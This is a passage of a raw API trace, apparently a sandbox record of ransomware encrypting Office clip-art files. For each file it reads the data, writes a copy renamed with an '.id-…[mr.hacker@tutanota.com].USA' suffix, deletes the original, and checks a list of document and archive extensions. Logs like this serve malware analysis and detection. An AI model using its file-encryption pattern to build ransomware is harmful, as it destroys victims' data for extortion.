lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.624] lstrlenW (lpString="J0093905.WMF") returned 12 [0273.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.625] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=42050) returned 1 [0273.625] CloseHandle (hObject=0x2ac) returned 1 [0273.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf")) returned 0x20 [0273.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.626] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.626] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.626] GetLastError () returned 0x0 [0273.626] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xa442, lpOverlapped=0x0) returned 1 [0273.629] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xa450, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xa450, lpOverlapped=0x0) returned 1 [0273.630] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.630] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.630] SetEndOfFile (hFile=0x2b0) returned 1 [0273.630] CloseHandle (hObject=0x2b0) returned 1 [0273.630] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.630] SetEndOfFile (hFile=0x2ac) returned 1 [0273.634] CloseHandle (hObject=0x2ac) returned 1 [0273.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf")) returned 1 [0273.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.634] lstrlenW (lpString=".doc") returned 4 [0273.634] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString=".docx") returned 5 [0273.635] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0273.635] lstrlenW (lpString=".pdf") returned 4 [0273.635] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString=".xls") returned 4 [0273.635] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.635] lstrlenW (lpString=".xlsx") returned 5 [0273.635] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0273.635] lstrlenW (lpString=".ppt") returned 4 [0273.635] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString=".zip") returned 4 [0273.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.635] lstrlenW (lpString=".rar") returned 4 [0273.635] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString=".bz2") returned 4 [0273.635] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString=".7z") returned 3 [0273.635] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString=".dbf") returned 4 [0273.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString=".1cd") returned 4 [0273.635] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString=".jpg") returned 4 [0273.635] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.635] lstrlenW (lpString=".doc") returned 4 [0273.635] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString=".docx") returned 5 [0273.636] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0273.636] lstrlenW (lpString=".pdf") returned 4 [0273.636] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString=".xls") returned 4 [0273.636] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.636] lstrlenW (lpString=".xlsx") returned 5 [0273.636] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0273.636] lstrlenW (lpString=".ppt") returned 4 [0273.636] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.636] lstrlenW (lpString=".zip") returned 4 [0273.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.636] lstrlenW (lpString=".rar") returned 4 [0273.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString=".bz2") returned 4 [0273.636] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString=".7z") returned 3 [0273.636] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.636] lstrlenW (lpString=".dbf") returned 4 [0273.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.636] lstrlenW (lpString=".1cd") returned 4 [0273.636] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63 [0273.636] lstrlenW (lpString=".jpg") returned 4 [0273.636] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.636] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.637] lstrlenW (lpString="J0098497.WMF") returned 12 [0273.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.637] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4970) returned 1 [0273.637] CloseHandle (hObject=0x2ac) returned 1 [0273.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf")) returned 0x20 [0273.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.637] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.637] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.638] GetLastError () returned 0x0 [0273.638] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x136a, lpOverlapped=0x0) returned 1 [0273.640] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1370, lpOverlapped=0x0) returned 1 [0273.641] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.641] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.641] SetEndOfFile (hFile=0x2b0) returned 1 [0273.641] CloseHandle (hObject=0x2b0) returned 1 [0273.641] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.641] SetEndOfFile (hFile=0x2ac) returned 1 [0273.643] CloseHandle (hObject=0x2ac) returned 1 [0273.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.643] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf")) returned 1 [0273.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.643] lstrlenW (lpString=".doc") returned 4 [0273.643] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.643] lstrlenW (lpString=".docx") returned 5 [0273.643] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0273.643] lstrlenW (lpString=".pdf") returned 4 [0273.643] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.643] lstrlenW (lpString=".xls") returned 4 [0273.644] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.644] lstrlenW (lpString=".xlsx") returned 5 [0273.644] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0273.644] lstrlenW (lpString=".ppt") returned 4 [0273.644] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString=".zip") returned 4 [0273.644] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.644] lstrlenW (lpString=".rar") returned 4 [0273.644] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString=".bz2") returned 4 [0273.644] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString=".7z") returned 3 [0273.644] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString=".dbf") returned 4 [0273.644] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString=".1cd") returned 4 [0273.644] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString=".jpg") returned 4 [0273.644] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.644] lstrlenW (lpString=".doc") returned 4 [0273.644] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString=".docx") returned 5 [0273.644] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0273.644] lstrlenW (lpString=".pdf") returned 4 [0273.644] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString=".xls") returned 4 [0273.645] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.645] lstrlenW (lpString=".xlsx") returned 5 [0273.645] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0273.645] lstrlenW (lpString=".ppt") returned 4 [0273.645] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.645] lstrlenW (lpString=".zip") returned 4 [0273.645] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.645] lstrlenW (lpString=".rar") returned 4 [0273.645] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString=".bz2") returned 4 [0273.645] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString=".7z") returned 3 [0273.645] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.645] lstrlenW (lpString=".dbf") returned 4 [0273.645] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.645] lstrlenW (lpString=".1cd") returned 4 [0273.645] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63 [0273.645] lstrlenW (lpString=".jpg") returned 4 [0273.645] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.645] lstrcmpiW (lpString1=".JPG", lpString2=".USA") returned -1 [0273.645] lstrlenW (lpString="J0099145.JPG") returned 12 [0273.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.646] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=24759) returned 1 [0273.646] CloseHandle (hObject=0x2ac) returned 1 [0273.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg")) returned 0x20 [0273.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.646] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.646] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.647] GetLastError () returned 0x0 [0273.647] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x60b7, lpOverlapped=0x0) returned 1 [0273.648] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x60c0, lpOverlapped=0x0) returned 1 [0273.650] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.650] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.650] SetEndOfFile (hFile=0x2b0) returned 1 [0273.650] CloseHandle (hObject=0x2b0) returned 1 [0273.650] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.650] SetEndOfFile (hFile=0x2ac) returned 1 [0273.652] CloseHandle (hObject=0x2ac) returned 1 [0273.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg")) returned 1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString=".doc") returned 4 [0273.653] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.653] lstrlenW (lpString=".docx") returned 5 [0273.653] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0273.653] lstrlenW (lpString=".pdf") returned 4 [0273.653] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.653] lstrlenW (lpString=".xls") returned 4 [0273.653] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.653] lstrlenW (lpString=".xlsx") returned 5 [0273.653] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0273.653] lstrlenW (lpString=".ppt") returned 4 [0273.653] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString=".zip") returned 4 [0273.653] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.653] lstrlenW (lpString=".rar") returned 4 [0273.653] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.653] lstrlenW (lpString=".bz2") returned 4 [0273.653] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.653] lstrlenW (lpString=".7z") returned 3 [0273.653] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString=".dbf") returned 4 [0273.653] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString=".1cd") returned 4 [0273.653] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.653] lstrlenW (lpString=".jpg") returned 4 [0273.653] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString=".doc") returned 4 [0273.654] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.654] lstrlenW (lpString=".docx") returned 5 [0273.654] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0273.654] lstrlenW (lpString=".pdf") returned 4 [0273.654] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.654] lstrlenW (lpString=".xls") returned 4 [0273.654] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.654] lstrlenW (lpString=".xlsx") returned 5 [0273.654] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0273.654] lstrlenW (lpString=".ppt") returned 4 [0273.654] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString=".zip") returned 4 [0273.654] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.654] lstrlenW (lpString=".rar") returned 4 [0273.654] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.654] lstrlenW (lpString=".bz2") returned 4 [0273.654] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.654] lstrlenW (lpString=".7z") returned 3 [0273.654] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString=".dbf") returned 4 [0273.654] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString=".1cd") returned 4 [0273.654] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63 [0273.654] lstrlenW (lpString=".jpg") returned 4 [0273.655] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.655] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.655] lstrlenW (lpString="J0099146.WMF") returned 12 [0273.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.655] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=16596) returned 1 [0273.655] CloseHandle (hObject=0x2ac) returned 1 [0273.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft 